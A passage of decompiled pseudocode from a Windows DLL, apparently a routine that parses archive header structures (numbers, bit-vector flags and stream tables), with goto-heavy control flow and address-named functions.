                                                                                                                                                      																		_t131 = __ebp + 0x5c; // 0x5c
                                                                                                                                                      																		__ecx = _t131;
                                                                                                                                                      																		L67:
                                                                                                                                                      																		__edx =  *(__esp + 0xc4);
                                                                                                                                                      																		__eax =  *(__esp + 0x28);
                                                                                                                                                      																		_push( *(__esp + 0xc4));
                                                                                                                                                      																		_push(__ebx);
                                                                                                                                                      																		_push(__eax);
                                                                                                                                                      																		_push(__ecx);
                                                                                                                                                      																		__eax = E10005FA0(__eflags);
                                                                                                                                                      																		__esp = __esp + 0x18;
                                                                                                                                                      																		__eflags = __eax;
                                                                                                                                                      																		if(__eax != 0) {
                                                                                                                                                      																			goto L159;
                                                                                                                                                      																		} else {
                                                                                                                                                      																			goto L71;
                                                                                                                                                      																		}
                                                                                                                                                      																		goto L161;
                                                                                                                                                      																	case 6:
                                                                                                                                                      																		__edi =  *(__esp + 0xc4);
                                                                                                                                                      																		_t110 = __ebp + 0x54; // 0x54
                                                                                                                                                      																		__esi = _t110;
                                                                                                                                                      																		__eax = E100047E0(__esi, __edi);
                                                                                                                                                      																		__eax =  *(__esp + 0x28);
                                                                                                                                                      																		__ecx = __ebx;
                                                                                                                                                      																		__eax = E10004C60( *(__esp + 0x28), __ebx, __esi, __edi);
                                                                                                                                                      																		__eflags = __eax;
                                                                                                                                                      																		if(__eax != 0) {
                                                                                                                                                      																			goto L159;
                                                                                                                                                      																		} else {
                                                                                                                                                      																			__eax =  *(__ebx + 4);
                                                                                                                                                      																			__eflags = __eax;
                                                                                                                                                      																			if(__eax == 0) {
                                                                                                                                                      																				goto L158;
                                                                                                                                                      																			}
                                                                                                                                                      																			 *(__ebx + 4) = __eax;
                                                                                                                                                      																			__eax =  *__ebx;
                                                                                                                                                      																			__cl =  *__eax;
                                                                                                                                                      																			__eax = __eax + 1;
                                                                                                                                                      																			__eflags = __cl;
                                                                                                                                                      																			 *__ebx = __eax;
                                                                                                                                                      																			if(__cl != 0) {
                                                                                                                                                      																				__eax =  *(__esp + 0xb4);
                                                                                                                                                      																				__ebx = __esp + 0x2c;
                                                                                                                                                      																				__eax = E10004AC0( *(__esp + 0xb4), __esp + 0x2c);
                                                                                                                                                      																				__eflags = __eax;
                                                                                                                                                      																				if(__eax != 0) {
                                                                                                                                                      																					goto L159;
                                                                                                                                                      																				} else {
                                                                                                                                                      																					__ecx =  *(__esp + 0x2c);
                                                                                                                                                      																					__edx =  *(__esp + 0xc0);
                                                                                                                                                      																					__eflags = __ecx -  *( *(__esp + 0xc0));
                                                                                                                                                      																					if(__ecx >=  *( *(__esp + 0xc0))) {
                                                                                                                                                      																						goto L158;
                                                                                                                                                      																					}
                                                                                                                                                      																					__eax =  *(__esp + 0xbc);
                                                                                                                                                      																					__edx =  *(__eax + __ecx * 8);
                                                                                                                                                      																					__eax =  *(__eax + 4 + __ecx * 8);
                                                                                                                                                      																					__ebx =  *(__esp + 0xb4);
                                                                                                                                                      																					 *(__esp + 0x40) = __eax;
                                                                                                                                                      																					 *(__esp + 0x3c) = __edx;
                                                                                                                                                      																					__eax = __esp + 0x3c;
                                                                                                                                                      																					goto L64;
                                                                                                                                                      																				}
                                                                                                                                                      																			} else {
                                                                                                                                                      																				__eax = __ebx;
                                                                                                                                                      																				L64:
                                                                                                                                                      																				__ecx =  *(__esp + 0x20);
                                                                                                                                                      																				_push( *(__esp + 0x20));
                                                                                                                                                      																				_push(__eax);
                                                                                                                                                      																				__eax = __edi;
                                                                                                                                                      																				__ecx = __esi;
                                                                                                                                                      																				__eax = E10004D30(__esi);
                                                                                                                                                      																				__esp = __esp + 8;
                                                                                                                                                      																				__eflags = __eax;
                                                                                                                                                      																				if(__eax != 0) {
                                                                                                                                                      																					goto L159;
                                                                                                                                                      																				} else {
                                                                                                                                                      																					L71:
                                                                                                                                                      																					_t427 = E100049A0(_t456, _t607 + 0x14);
                                                                                                                                                      																					__eflags = _t427;
                                                                                                                                                      																					if(_t427 == 0) {
                                                                                                                                                      																						goto L29;
                                                                                                                                                      																					} else {
                                                                                                                                                      																						return _t427;
                                                                                                                                                      																					}
                                                                                                                                                      																				}
                                                                                                                                                      																			}
                                                                                                                                                      																		}
                                                                                                                                                      																		goto L161;
                                                                                                                                                      																}
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      												goto L161;
                                                                                                                                                      											}
                                                                                                                                                      											__eflags =  *(_t607 + 0x20) -  *((intOrPtr*)(_t607 + 0x24)) -  *((intOrPtr*)(_t607 + 0x50));
                                                                                                                                                      											if( *(_t607 + 0x20) -  *((intOrPtr*)(_t607 + 0x24)) !=  *((intOrPtr*)(_t607 + 0x50))) {
                                                                                                                                                      												goto L158;
                                                                                                                                                      											}
                                                                                                                                                      											_t366 = E100049A0(_t456, _t607 + 0x14);
                                                                                                                                                      											__eflags = _t366;
                                                                                                                                                      											if(_t366 != 0) {
                                                                                                                                                      												goto L159;
                                                                                                                                                      											} else {
                                                                                                                                                      												while(1) {
                                                                                                                                                      													__eflags =  *(_t607 + 0x14) |  *(_t607 + 0x18);
                                                                                                                                                      													if(( *(_t607 + 0x14) |  *(_t607 + 0x18)) == 0) {
                                                                                                                                                      														break;
                                                                                                                                                      													}
                                                                                                                                                      													_t366 = E10004B40(_t456);
                                                                                                                                                      													__eflags = _t366;
                                                                                                                                                      													if(_t366 != 0) {
                                                                                                                                                      														goto L159;
                                                                                                                                                      													} else {
                                                                                                                                                      														_t424 = E100049A0(_t456, _t607 + 0x14);
                                                                                                                                                      														__eflags = _t424;
                                                                                                                                                      														if(_t424 == 0) {
                                                                                                                                                      															continue;
                                                                                                                                                      														} else {
                                                                                                                                                      															return _t424;
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      													goto L161;
                                                                                                                                                      												}
                                                                                                                                                      												_t584 =  *((intOrPtr*)(_t607 + 0xc4));
                                                                                                                                                      												 *((intOrPtr*)(_t607 + 0x4c)) = 0;
                                                                                                                                                      												 *((intOrPtr*)(_t607 + 0x24)) = 0;
                                                                                                                                                      												 *(_t607 + 0x44) = 0;
                                                                                                                                                      												 *((intOrPtr*)(_t607 + 0x3c)) = 0;
                                                                                                                                                      												 *(_t607 + 0x1c) = 0;
                                                                                                                                                      												 *(_t607 + 0x20) = 0;
                                                                                                                                                      												 *((intOrPtr*)(_t607 + 0x34)) = 0;
                                                                                                                                                      												 *(_t607 + 0x2c) = 0;
                                                                                                                                                      												 *((char*)(_t607 + 0x1b)) = 0;
                                                                                                                                                      												 *((char*)(_t607 + 0x1a)) = 0;
                                                                                                                                                      												 *((char*)(_t607 + 0x19)) = 0;
                                                                                                                                                      												 *(_t607 + 0x18) = 0x80;
                                                                                                                                                      												_t375 =  *((intOrPtr*)( *_t584))(_t584, 4 +  *(_t606 + 4) * 4);
                                                                                                                                                      												_t608 = _t607 + 8;
                                                                                                                                                      												__eflags = _t375;
                                                                                                                                                      												 *(_t606 + 0x6c) = _t375;
                                                                                                                                                      												if(_t375 == 0) {
                                                                                                                                                      													goto L160;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t377 =  *(_t606 + 0x40);
                                                                                                                                                      													__eflags = _t377;
                                                                                                                                                      													if(_t377 != 0) {
                                                                                                                                                      														_t378 =  *((intOrPtr*)( *_t584))(_t584, _t377 * 4);
                                                                                                                                                      														_t608 = _t608 + 8;
                                                                                                                                                      														__eflags = _t378;
                                                                                                                                                      														 *(_t606 + 0x70) = _t378;
                                                                                                                                                      														if(_t378 == 0) {
                                                                                                                                                      															goto L160;
                                                                                                                                                      														} else {
                                                                                                                                                      															goto L84;
                                                                                                                                                      														}
                                                                                                                                                      													} else {
                                                                                                                                                      														 *(_t606 + 0x70) = 0;
                                                                                                                                                      														L84:
                                                                                                                                                      														_t380 =  *((intOrPtr*)( *_t584))(_t584, 8 +  *(_t606 + 0x40) * 8);
                                                                                                                                                      														_t609 = _t608 + 8;
                                                                                                                                                      														__eflags = _t380;
                                                                                                                                                      														 *(_t606 + 0x44) = _t380;
                                                                                                                                                      														if(_t380 == 0) {
                                                                                                                                                      															goto L160;
                                                                                                                                                      														} else {
                                                                                                                                                      															_t383 =  *(_t606 + 0x40) + 7 >> 3;
                                                                                                                                                      															__eflags = _t383;
                                                                                                                                                      															if(_t383 != 0) {
                                                                                                                                                      																_t385 =  *((intOrPtr*)( *_t584))(_t584, _t383);
                                                                                                                                                      																_t609 = _t609 + 8;
                                                                                                                                                      																__eflags = _t385;
                                                                                                                                                      																 *(_t606 + 0x48) = _t385;
                                                                                                                                                      																if(_t385 == 0) {
                                                                                                                                                      																	goto L160;
                                                                                                                                                      																} else {
                                                                                                                                                      																	goto L88;
                                                                                                                                                      																}
                                                                                                                                                      															} else {
                                                                                                                                                      																 *(_t606 + 0x48) = 0;
                                                                                                                                                      																L88:
                                                                                                                                                      																_t366 = E10004790(_t606 + 0x4c,  *(_t606 + 0x40), _t584);
                                                                                                                                                      																__eflags = _t366;
                                                                                                                                                      																if(_t366 != 0) {
                                                                                                                                                      																	goto L159;
                                                                                                                                                      																} else {
                                                                                                                                                      																	__eflags =  *((intOrPtr*)(_t609 + 0x6c)) - _t366;
                                                                                                                                                      																	if( *((intOrPtr*)(_t609 + 0x6c)) != _t366) {
                                                                                                                                                      																		_t421 =  *(_t609 + 0x68);
                                                                                                                                                      																		_t504 =  *_t421;
                                                                                                                                                      																		 *((intOrPtr*)(_t609 + 0x6c)) =  *((intOrPtr*)(_t609 + 0x6c)) - 1;
                                                                                                                                                      																		_t422 = _t421 + 1;
                                                                                                                                                      																		__eflags = _t504;
                                                                                                                                                      																		 *((char*)(_t609 + 0x13)) = _t504;
                                                                                                                                                      																		 *(_t609 + 0x68) = _t422;
                                                                                                                                                      																		if(_t504 == 0) {
                                                                                                                                                      																			_t508 = ( *((intOrPtr*)(_t609 + 0x54)) + 7 >> 3) + _t422;
                                                                                                                                                      																			__eflags = _t508;
                                                                                                                                                      																			 *(_t609 + 0x2c) = _t422;
                                                                                                                                                      																			 *(_t609 + 0x24) = _t508;
                                                                                                                                                      																		} else {
                                                                                                                                                      																			 *(_t609 + 0x24) = _t422;
                                                                                                                                                      																		}
                                                                                                                                                      																	}
                                                                                                                                                      																	__eflags =  *(_t609 + 0x20);
                                                                                                                                                      																	 *(_t609 + 0x28) = 0;
                                                                                                                                                      																	if( *(_t609 + 0x20) <= 0) {
                                                                                                                                                      																		L149:
                                                                                                                                                      																		__eflags =  *(_t609 + 0x3c);
                                                                                                                                                      																		_t386 =  *(_t606 + 0x44);
                                                                                                                                                      																		_t470 =  *(_t609 + 0x28);
                                                                                                                                                      																		 *((intOrPtr*)(_t386 + _t470 * 8)) =  *((intOrPtr*)(_t609 + 0x14));
                                                                                                                                                      																		 *(_t386 + 4 + _t470 * 8) =  *(_t609 + 0x18);
                                                                                                                                                      																		if( *(_t609 + 0x3c) != 0) {
                                                                                                                                                      																			goto L158;
                                                                                                                                                      																		}
                                                                                                                                                      																		_t387 =  *(_t609 + 0x1c);
                                                                                                                                                      																		 *( *(_t606 + 0x6c) + _t387 * 4) = _t470;
                                                                                                                                                      																		__eflags = _t387 -  *(_t606 + 4);
                                                                                                                                                      																		if(_t387 >=  *(_t606 + 4)) {
                                                                                                                                                      																			L156:
                                                                                                                                                      																			__eflags =  *(_t609 + 0x58);
                                                                                                                                                      																			if( *(_t609 + 0x58) != 0) {
                                                                                                                                                      																				__eflags =  *(_t609 + 0x5c);
                                                                                                                                                      																				if( *(_t609 + 0x5c) != 0) {
                                                                                                                                                      																					goto L158;
                                                                                                                                                      																				}
                                                                                                                                                      																			}
                                                                                                                                                      																			goto L23;
                                                                                                                                                      																		} else {
                                                                                                                                                      																			_t585 = _t387;
                                                                                                                                                      																			_t565 = _t470;
                                                                                                                                                      																			while(1) {
                                                                                                                                                      																				__eflags =  *(_t609 + 0x58);
                                                                                                                                                      																				if( *(_t609 + 0x58) == 0) {
                                                                                                                                                      																					goto L158;
                                                                                                                                                      																				}
                                                                                                                                                      																				_t366 = E10004AC0(_t609 + 0x58, _t609 + 0x34);
                                                                                                                                                      																				__eflags = _t366;
                                                                                                                                                      																				if(_t366 != 0) {
                                                                                                                                                      																					goto L159;
                                                                                                                                                      																				} else {
                                                                                                                                                      																					__eflags =  *(_t609 + 0x34) - _t366;
                                                                                                                                                      																					if( *(_t609 + 0x34) != _t366) {
                                                                                                                                                      																						goto L158;
                                                                                                                                                      																					}
                                                                                                                                                      																					_t585 = _t585 + 1;
                                                                                                                                                      																					 *( *(_t606 + 0x6c) + _t585 * 4) = _t565;
                                                                                                                                                      																					__eflags = _t585 -  *(_t606 + 4);
                                                                                                                                                      																					if(_t585 <  *(_t606 + 4)) {
                                                                                                                                                      																						continue;
                                                                                                                                                      																					} else {
                                                                                                                                                      																						goto L156;
                                                                                                                                                      																					}
                                                                                                                                                      																				}
                                                                                                                                                      																				goto L161;
                                                                                                                                                      																			}
                                                                                                                                                      																			goto L158;
                                                                                                                                                      																		}
                                                                                                                                                      																	} else {
                                                                                                                                                      																		do {
                                                                                                                                                      																			__eflags =  *(_t609 + 0x10);
                                                                                                                                                      																			_t586 =  *(_t609 + 0x28);
                                                                                                                                                      																			if( *(_t609 + 0x10) == 0) {
                                                                                                                                                      																				_t401 = _t586 + 0xffffffff >> 3;
                                                                                                                                                      																				__eflags = _t401;
                                                                                                                                                      																				 *((char*)(_t401 +  *(_t606 + 0x48))) =  *(_t609 + 0x12) & 0x000000ff;
                                                                                                                                                      																				 *((char*)(_t401 +  *((intOrPtr*)(_t606 + 0x4c)))) =  *(_t609 + 0x11) & 0x000000ff;
                                                                                                                                                      																				 *(_t609 + 0x12) = 0;
                                                                                                                                                      																				 *(_t609 + 0x11) = 0;
                                                                                                                                                      																				 *(_t609 + 0x10) = 0x80;
                                                                                                                                                      																			}
                                                                                                                                                      																			_t391 =  *(_t606 + 0x44);
                                                                                                                                                      																			_t459 =  *(_t609 + 0x30);
                                                                                                                                                      																			__eflags = _t459;
                                                                                                                                                      																			 *((intOrPtr*)(_t391 + _t586 * 8)) =  *((intOrPtr*)(_t609 + 0x14));
                                                                                                                                                      																			 *(_t391 + 4 + _t586 * 8) =  *(_t609 + 0x18);
                                                                                                                                                      																			_t533 =  *(_t606 + 0x50);
                                                                                                                                                      																			 *(_t533 + _t586 * 4) = 0;
                                                                                                                                                      																			if(_t459 == 0) {
                                                                                                                                                      																				L106:
                                                                                                                                                      																				__eflags =  *(_t609 + 0x3c);
                                                                                                                                                      																				if( *(_t609 + 0x3c) != 0) {
                                                                                                                                                      																					goto L117;
                                                                                                                                                      																				} else {
                                                                                                                                                      																					_t566 =  *(_t609 + 0x1c);
                                                                                                                                                      																					while(1) {
                                                                                                                                                      																						__eflags = _t566 -  *(_t606 + 4);
                                                                                                                                                      																						if(_t566 >=  *(_t606 + 4)) {
                                                                                                                                                      																							goto L158;
                                                                                                                                                      																						}
                                                                                                                                                      																						__eflags =  *(_t609 + 0x58);
                                                                                                                                                      																						_t533 =  *(_t606 + 0x6c);
                                                                                                                                                      																						 *(_t533 + _t566 * 4) = _t586;
                                                                                                                                                      																						 *(_t609 + 0x34) = 1;
                                                                                                                                                      																						if( *(_t609 + 0x58) == 0) {
                                                                                                                                                      																							L112:
                                                                                                                                                      																							_t413 =  *(_t609 + 0x34);
                                                                                                                                                      																							__eflags = _t413;
                                                                                                                                                      																							 *(_t609 + 0x3c) = _t413;
                                                                                                                                                      																							if(_t413 != 0) {
                                                                                                                                                      																								goto L118;
                                                                                                                                                      																							} else {
                                                                                                                                                      																								_t414 = E10005A70(_t606, _t566);
                                                                                                                                                      																								_t493 =  *(_t609 + 0x20);
                                                                                                                                                      																								_t609 = _t609 + 8;
                                                                                                                                                      																								 *((intOrPtr*)(_t609 + 0x14)) =  *((intOrPtr*)(_t609 + 0x14)) + _t414;
                                                                                                                                                      																								asm("adc ecx, edx");
                                                                                                                                                      																								__eflags = _t493 - _t533;
                                                                                                                                                      																								 *(_t609 + 0x18) = _t493;
                                                                                                                                                      																								if(__eflags < 0) {
                                                                                                                                                      																									goto L158;
                                                                                                                                                      																								}
                                                                                                                                                      																								if(__eflags <= 0) {
                                                                                                                                                      																									__eflags =  *((intOrPtr*)(_t609 + 0x14)) - _t414;
                                                                                                                                                      																									if( *((intOrPtr*)(_t609 + 0x14)) < _t414) {
                                                                                                                                                      																										goto L158;
                                                                                                                                                      																									}
                                                                                                                                                      																								}
                                                                                                                                                      																								_t566 = _t566 + 1;
                                                                                                                                                      																								 *(_t609 + 0x1c) = _t566;
                                                                                                                                                      																								continue;
                                                                                                                                                      																							}
                                                                                                                                                      																						} else {
                                                                                                                                                      																							_t366 = E10004AC0(_t609 + 0x58, _t609 + 0x34);
                                                                                                                                                      																							__eflags = _t366;
                                                                                                                                                      																							if(_t366 != 0) {
                                                                                                                                                      																								goto L159;
                                                                                                                                                      																							} else {
                                                                                                                                                      																								_t459 =  *(_t609 + 0x30);
                                                                                                                                                      																								goto L112;
                                                                                                                                                      																							}
                                                                                                                                                      																						}
                                                                                                                                                      																						goto L161;
                                                                                                                                                      																					}
                                                                                                                                                      																					goto L158;
                                                                                                                                                      																				}
                                                                                                                                                      																			} else {
                                                                                                                                                      																				_t417 = 0x80 >> (_t586 & 0x00000007);
                                                                                                                                                      																				_t533 =  *((intOrPtr*)((_t586 >> 3) + _t459));
                                                                                                                                                      																				__eflags = _t533 & _t417;
                                                                                                                                                      																				if((_t533 & _t417) == 0) {
                                                                                                                                                      																					goto L106;
                                                                                                                                                      																				} else {
                                                                                                                                                      																					_t568 =  *(_t609 + 0x4c);
                                                                                                                                                      																					__eflags = _t568;
                                                                                                                                                      																					if(_t568 == 0) {
                                                                                                                                                      																						_t226 = _t609 + 0x12;
                                                                                                                                                      																						 *_t226 =  *(_t609 + 0x12) |  *(_t609 + 0x10);
                                                                                                                                                      																						__eflags =  *_t226;
                                                                                                                                                      																					} else {
                                                                                                                                                      																						_t419 =  *(_t609 + 0x44);
                                                                                                                                                      																						_t533 = 0x80 >> (_t419 & 0x00000007);
                                                                                                                                                      																						_t503 =  *((intOrPtr*)((_t419 >> 3) + _t568));
                                                                                                                                                      																						__eflags = _t503 & _t533;
                                                                                                                                                      																						if((_t503 & _t533) == 0) {
                                                                                                                                                      																							_t533 =  *(_t609 + 0x10);
                                                                                                                                                      																							_t222 = _t609 + 0x12;
                                                                                                                                                      																							 *_t222 =  *(_t609 + 0x12) | _t533;
                                                                                                                                                      																							__eflags =  *_t222;
                                                                                                                                                      																						}
                                                                                                                                                      																						 *(_t609 + 0x44) = _t419 + 1;
                                                                                                                                                      																					}
                                                                                                                                                      																					__eflags =  *(_t609 + 0x3c);
                                                                                                                                                      																					if( *(_t609 + 0x3c) != 0) {
                                                                                                                                                      																						L117:
                                                                                                                                                      																						_t566 =  *(_t609 + 0x1c);
                                                                                                                                                      																						L118:
                                                                                                                                                      																						__eflags = _t459;
                                                                                                                                                      																						 *( *(_t606 + 0x70) + _t586 * 4) = _t566;
                                                                                                                                                      																						if(_t459 == 0) {
                                                                                                                                                      																							L121:
                                                                                                                                                      																							_t259 = _t609 + 0x3c;
                                                                                                                                                      																							 *_t259 =  *(_t609 + 0x3c) - 1;
                                                                                                                                                      																							__eflags =  *_t259;
                                                                                                                                                      																							if( *_t259 != 0) {
                                                                                                                                                      																								_t366 = E100049A0(_t609 + 0x60, _t609 + 0x78);
                                                                                                                                                      																								__eflags = _t366;
                                                                                                                                                      																								if(_t366 != 0) {
                                                                                                                                                      																									goto L159;
                                                                                                                                                      																								} else {
                                                                                                                                                      																									_t534 =  *((intOrPtr*)(_t609 + 0x78));
                                                                                                                                                      																									 *((intOrPtr*)(_t609 + 0x14)) =  *((intOrPtr*)(_t609 + 0x14)) + _t534;
                                                                                                                                                      																									_t473 =  *(_t609 + 0x18);
                                                                                                                                                      																									asm("adc ecx, eax");
                                                                                                                                                      																									__eflags = _t473 -  *((intOrPtr*)(_t609 + 0x7c));
                                                                                                                                                      																									 *(_t609 + 0x18) = _t473;
                                                                                                                                                      																									if(__eflags < 0) {
                                                                                                                                                      																										goto L158;
                                                                                                                                                      																									}
                                                                                                                                                      																									if(__eflags <= 0) {
                                                                                                                                                      																										__eflags =  *((intOrPtr*)(_t609 + 0x14)) - _t534;
                                                                                                                                                      																										if( *((intOrPtr*)(_t609 + 0x14)) < _t534) {
                                                                                                                                                      																											goto L158;
                                                                                                                                                      																										}
                                                                                                                                                      																									}
                                                                                                                                                      																									__eflags =  *((char*)(_t609 + 0x13));
                                                                                                                                                      																									if( *((char*)(_t609 + 0x13)) != 0) {
                                                                                                                                                      																										L145:
                                                                                                                                                      																										_t394 =  *(_t609 + 0x24);
                                                                                                                                                      																										 *(_t609 + 0x24) = _t394 + 4;
                                                                                                                                                      																										_t324 = _t609 + 0x11;
                                                                                                                                                      																										 *_t324 =  *(_t609 + 0x11) |  *(_t609 + 0x10);
                                                                                                                                                      																										__eflags =  *_t324;
                                                                                                                                                      																										 *((intOrPtr*)( *(_t606 + 0x50) +  *(_t609 + 0x28) * 4)) =  *_t394;
                                                                                                                                                      																									} else {
                                                                                                                                                      																										_t404 =  *(_t609 + 0x2c);
                                                                                                                                                      																										__eflags = _t404;
                                                                                                                                                      																										if(_t404 != 0) {
                                                                                                                                                      																											__eflags =  *_t404 & 0x00000080;
                                                                                                                                                      																											if(( *_t404 & 0x00000080) != 0) {
                                                                                                                                                      																												goto L145;
                                                                                                                                                      																											}
                                                                                                                                                      																										}
                                                                                                                                                      																									}
                                                                                                                                                      																									goto L146;
                                                                                                                                                      																								}
                                                                                                                                                      																							} else {
                                                                                                                                                      																								_t405 = E10005A70(_t606, _t566);
                                                                                                                                                      																								_t460 = _t533;
                                                                                                                                                      																								_t540 =  *( *(_t606 + 0x6c) + _t566 * 4);
                                                                                                                                                      																								 *((intOrPtr*)(_t609 + 0x78)) = _t405;
                                                                                                                                                      																								_t406 =  *(_t606 + 0x44);
                                                                                                                                                      																								_t480 =  *((intOrPtr*)(_t406 + _t540 * 8));
                                                                                                                                                      																								_t589 =  *(_t406 + 4 + _t540 * 8);
                                                                                                                                                      																								_t407 =  *(_t609 + 0x1c);
                                                                                                                                                      																								_t541 =  *(_t609 + 0x20);
                                                                                                                                                      																								_t609 = _t609 + 8;
                                                                                                                                                      																								_t408 = _t407 - _t480;
                                                                                                                                                      																								asm("sbb edx, esi");
                                                                                                                                                      																								__eflags = _t460 - _t541;
                                                                                                                                                      																								if(__eflags < 0) {
                                                                                                                                                      																									goto L158;
                                                                                                                                                      																								}
                                                                                                                                                      																								_t542 =  *((intOrPtr*)(_t609 + 0x70));
                                                                                                                                                      																								if(__eflags <= 0) {
                                                                                                                                                      																									__eflags = _t542 - _t408;
                                                                                                                                                      																									if(_t542 < _t408) {
                                                                                                                                                      																										goto L158;
                                                                                                                                                      																									}
                                                                                                                                                      																								}
                                                                                                                                                      																								_t481 = _t480 + _t542;
                                                                                                                                                      																								asm("adc esi, ebx");
                                                                                                                                                      																								__eflags = _t589 - _t460;
                                                                                                                                                      																								 *((intOrPtr*)(_t609 + 0x14)) = _t481;
                                                                                                                                                      																								 *(_t609 + 0x18) = _t589;
                                                                                                                                                      																								if(__eflags < 0) {
                                                                                                                                                      																									goto L158;
                                                                                                                                                      																								}
                                                                                                                                                      																								if(__eflags <= 0) {
                                                                                                                                                      																									__eflags = _t481 - _t542;
                                                                                                                                                      																									if(_t481 < _t542) {
                                                                                                                                                      																										goto L158;
                                                                                                                                                      																									}
                                                                                                                                                      																								}
                                                                                                                                                      																								__eflags =  *(_t609 + 0x34) - 1;
                                                                                                                                                      																								if( *(_t609 + 0x34) != 1) {
                                                                                                                                                      																									L132:
                                                                                                                                                      																									_t409 =  *(_t609 + 0x28);
                                                                                                                                                      																									goto L133;
                                                                                                                                                      																								} else {
                                                                                                                                                      																									_t591 =  *(_t606 + 0xc);
                                                                                                                                                      																									__eflags = _t591;
                                                                                                                                                      																									if(_t591 == 0) {
                                                                                                                                                      																										goto L132;
                                                                                                                                                      																									} else {
                                                                                                                                                      																										_t409 =  *(_t609 + 0x28);
                                                                                                                                                      																										_t545 = 0x80 >> (_t409 & 0x00000007);
                                                                                                                                                      																										_t489 =  *((intOrPtr*)((_t409 >> 3) + _t591));
                                                                                                                                                      																										__eflags = _t489 & _t545;
                                                                                                                                                      																										if((_t489 & _t545) == 0) {
                                                                                                                                                      																											L133:
                                                                                                                                                      																											__eflags =  *((char*)(_t609 + 0x13));
                                                                                                                                                      																											if( *((char*)(_t609 + 0x13)) != 0) {
                                                                                                                                                      																												L136:
                                                                                                                                                      																												_t482 =  *(_t609 + 0x24);
                                                                                                                                                      																												 *((intOrPtr*)( *(_t606 + 0x50) + _t409 * 4)) =  *_t482;
                                                                                                                                                      																												_t302 = _t609 + 0x11;
                                                                                                                                                      																												 *_t302 =  *(_t609 + 0x11) |  *(_t609 + 0x10);
                                                                                                                                                      																												__eflags =  *_t302;
                                                                                                                                                      																												 *(_t609 + 0x24) = _t482 + 4;
                                                                                                                                                      																											} else {
                                                                                                                                                      																												_t484 =  *(_t609 + 0x2c);
                                                                                                                                                      																												__eflags = _t484;
                                                                                                                                                      																												if(_t484 != 0) {
                                                                                                                                                      																													__eflags =  *_t484 & 0x00000080;
                                                                                                                                                      																													if(( *_t484 & 0x00000080) != 0) {
                                                                                                                                                      																														goto L136;
                                                                                                                                                      																													}
                                                                                                                                                      																												}
                                                                                                                                                      																											}
                                                                                                                                                      																											 *(_t609 + 0x1c) = _t566 + 1;
                                                                                                                                                      																										} else {
                                                                                                                                                      																											 *((intOrPtr*)( *(_t606 + 0x50) + _t409 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t606 + 0x10)) + _t566 * 4));
                                                                                                                                                      																											 *(_t609 + 0x11) =  *(_t609 + 0x11) |  *(_t609 + 0x10);
                                                                                                                                                      																											 *(_t609 + 0x1c) = _t566 + 1;
                                                                                                                                                      																										}
                                                                                                                                                      																									}
                                                                                                                                                      																								}
                                                                                                                                                      																								goto L146;
                                                                                                                                                      																							}
                                                                                                                                                      																						} else {
                                                                                                                                                      																							_t533 = 0x80 >> (_t586 & 0x00000007);
                                                                                                                                                      																							_t412 =  *((intOrPtr*)((_t586 >> 3) + _t459));
                                                                                                                                                      																							__eflags = _t412 & _t533;
                                                                                                                                                      																							if((_t412 & _t533) != 0) {
                                                                                                                                                      																								goto L146;
                                                                                                                                                      																							} else {
                                                                                                                                                      																								_t566 =  *(_t609 + 0x1c);
                                                                                                                                                      																								goto L121;
                                                                                                                                                      																							}
                                                                                                                                                      																						}
                                                                                                                                                      																					} else {
                                                                                                                                                      																						 *( *(_t606 + 0x70) + _t586 * 4) = 0xffffffff;
                                                                                                                                                      																						goto L146;
                                                                                                                                                      																					}
                                                                                                                                                      																				}
                                                                                                                                                      																			}
                                                                                                                                                      																			goto L161;
                                                                                                                                                      																			L146:
                                                                                                                                                      																			 *(_t609 + 0x10) =  *(_t609 + 0x10) >> 1;
                                                                                                                                                      																			_t398 =  *(_t609 + 0x28) + 1;
                                                                                                                                                      																			__eflags = _t398 -  *(_t609 + 0x20);
                                                                                                                                                      																			 *(_t609 + 0x28) = _t398;
                                                                                                                                                      																		} while (_t398 <  *(_t609 + 0x20));
                                                                                                                                                      																		__eflags =  *(_t609 + 0x10) - 0x80;
                                                                                                                                                      																		if( *(_t609 + 0x10) != 0x80) {
                                                                                                                                                      																			_t403 = _t398 + 0xffffffff >> 3;
                                                                                                                                                      																			__eflags = _t403;
                                                                                                                                                      																			 *((char*)(_t403 +  *(_t606 + 0x48))) =  *(_t609 + 0x12) & 0x000000ff;
                                                                                                                                                      																			 *((char*)(_t403 +  *((intOrPtr*)(_t606 + 0x4c)))) =  *(_t609 + 0x11) & 0x000000ff;
                                                                                                                                                      																		}
                                                                                                                                                      																		goto L149;
                                                                                                                                                      																	}
                                                                                                                                                      																}
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									L23:
                                                                                                                                                      									__eflags = 0;
                                                                                                                                                      									return 0;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								__eflags =  *(_t607 + 0x18);
                                                                                                                                                      								if( *(_t607 + 0x18) != 0) {
                                                                                                                                                      									goto L22;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t599 = _t606 + 0x38;
                                                                                                                                                      									_t366 = E10005CE0( *((intOrPtr*)(_t607 + 0xc0)), _t607 + 0x68, _t606, 0x40000000,  *((intOrPtr*)(_t607 + 0xc0)),  *((intOrPtr*)( *((intOrPtr*)(_t607 + 0xc0)))), _t599,  *((intOrPtr*)(_t607 + 0xc4)));
                                                                                                                                                      									_t607 = _t607 + 0x18;
                                                                                                                                                      									__eflags = _t366;
                                                                                                                                                      									if(_t366 != 0) {
                                                                                                                                                      										goto L159;
                                                                                                                                                      									} else {
                                                                                                                                                      										 *_t599 =  *_t599 +  *((intOrPtr*)(_t606 + 0x30));
                                                                                                                                                      										asm("adc [esi+0x4], eax");
                                                                                                                                                      										_t366 = E100049A0( *(_t607 + 0xb4), _t607 + 0x14);
                                                                                                                                                      										__eflags = _t366;
                                                                                                                                                      										if(_t366 != 0) {
                                                                                                                                                      											goto L159;
                                                                                                                                                      										} else {
                                                                                                                                                      											_t367 =  *(_t607 + 0x14);
                                                                                                                                                      											goto L22;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							__eflags =  *(_t607 + 0x18);
